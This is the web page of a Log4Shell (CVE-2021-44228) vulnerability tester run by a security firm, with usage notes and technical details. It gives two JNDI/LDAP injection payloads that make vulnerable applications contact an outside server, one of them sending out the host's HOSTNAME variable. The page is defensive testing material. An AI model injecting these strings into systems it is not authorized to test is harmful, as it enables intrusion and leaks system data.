Huntress Log4Shell Vulnerability Tester

Our team is continuing to investigate CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software. The source code for this tool is available on GitHub at huntresslabs/log4shell-tester.

This site can help you test whether your applications are vulnerable to Log4Shell (CVE-2021-44228). Here's how to use it:

Please know that a negative test does not guarantee that your application is patched. The tool is designed to offer a simpler means of testing and is intended for testing purposes only—it should only be used on systems you are authorized to test. If you find any vulnerabilities, please follow responsible disclosure guidelines.

Your unique identifier is: c3076a0d-f0cc-4e63-a687-c5e46906ecc4. You can use the payload below for testing:

${jndi:ldap://log4shell.huntress.com:1389/c3076a0d-f0cc-4e63-a687-c5e46906ecc4}

If you need other values, you can use the extra keys mechanism. This works by adding path components to the LDAP path in the above payload. Any values separated by / in the LDAP path will be included in the extra keys column on the results page. The only requirement is that your UUID is the last item in the list. For example, the following returns the hostname in the extra keys:

${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/c3076a0d-f0cc-4e63-a687-c5e46906ecc4}

View Connections

Technical Details

The tool works by generating a random unique identifier which you can use when testing input fields. If an input field or application is vulnerable, it will reach out to this website over LDAP. Our LDAP server will immediately terminate the connection, and log it for a short time. This tool will not actually run any code on your systems.